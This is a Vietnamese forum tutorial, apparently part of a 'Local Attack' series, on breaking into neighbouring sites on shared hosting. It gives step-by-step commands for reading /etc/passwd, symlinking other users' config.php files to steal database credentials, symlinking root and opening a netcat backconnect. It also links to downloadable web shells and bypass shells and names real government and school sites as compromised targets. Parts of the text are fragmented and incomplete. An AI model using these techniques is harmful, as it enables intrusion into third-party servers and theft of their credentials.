Hướng dẫn dùng symlink example trong PHP
Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ bài 2 – Giới thiệu tính năng 1 số shell * Nhắc lại trình tự các bước Local Attack 1- View danh sách các user trên server Cat /etc/passwd Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt Less /etc/passwd Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau: Cat /etc/virtual/domainowners ( Chỉ dùng đối với direct admin ) 2- Tìm file path file config.php – Vbulletin: – Discuz Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php ( Để tìm kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code tương tự như: “require_once(CWD . ‘/includes/init.php’);” – Đây là path mặc định dẫn tới file init.php))…… Ls -lia /home/vhbgroup/public_html/@4rum/includes.config.php – Cat, ./cat, less, more, tail : View nôi dung bên trong các file: Cat /home/vhbgroup/public_html/@4rum/includes/config.php – Ln : Lệnh symbolic link: Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini – Cd: Chuyển đổi thư mục Cd /home/vhbgroup/public_html/@4rum/includes/soleil – Chmod: Phân quyền cho các file hoặc thư mục: Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php ) – Mkdir: tạo thư mục: Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil – Touch : Tạo file: touch /home/vhbgroup/public_html/@4rum/includes/soleil.php – Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz) Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip) ………… dir /home/vhbgroup/public_html/includes Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thi Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path /home/vhbgroup/public_html/@4rum/includes/config.php Trong đó file soleil.ini là file đã được symbolic link trên server. – Lệnh xem file logs như sau: Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server. – Click vào done và thư mục có tên là tmp sẽ được tạo ra. – Vào link shell http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa – Coppy toàn bộ thông tin user có được từ câu lệnh: cat /etc/passwd vào khung như hình ảnh dưới đây rồi ấn “get config” – Cuối cùng trở lại link http://vksbinhphuoc.gov.vn/soleil/tmp/ , chúng ta sẽ có được danh sách các file config của các site trên server. * Đặc điểm của con shell get all config này: 6- Symbolink Root: Tar –zxvf r00t.tar.gz – Up file .htacess cùng thư mục với file r00t: Options all – Nếu không sủ dụng file r00t.tar.gz đó, có thể thực hiện sym root ngay trên shell Và đây là cấu trúc của trường http://cdhh.edu.vn/ 7- Backconnet: nc -nvv -l -p 80 + –l: đặt netcat vào chế độ lắng nghe để chề kết nối đến + Soleil.pin http://www.mediafire.com/?4k94v1i0shmr46c Cách sử dụng: ## START ## Hoặc: AddType application/x-httpd-cgi .cin AddHandler cgi-script .pin + telnet.pl shell telnet.pl có chức năng hoàn toàn tương tự với con shell soleil.pin. Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là chạy được. ( Pass unlock: soleil_vhb, pass dải nén nếu có : ceh.vn ) – * Đối với các server không có chức năng run command và cũng không cho chạy shell cgi thì có thể sử dụng các shell sau để bypass đơn giản đối với 1 số server. + fakesymlink.php http://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1 http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 ) + 529bypass.php http://www.mediafire.com/?cls0e5k873w83ef + Bypassnull.php http://www.mediafire.com/?1x0zxmig5ctwezr + Hoặc sử dụng safe mode bypass + Sử dụng các chức năng bypass trên con shell r57vip này ( nên convert domain sang dạng ip) + Hoặc sử dụng via sqli
Nguồn http://web.archive.org/web/20150423012615/http://root.vn/threads/tong-hop-cac-phuong-phap-local-attack-thuong-dung.2834/ |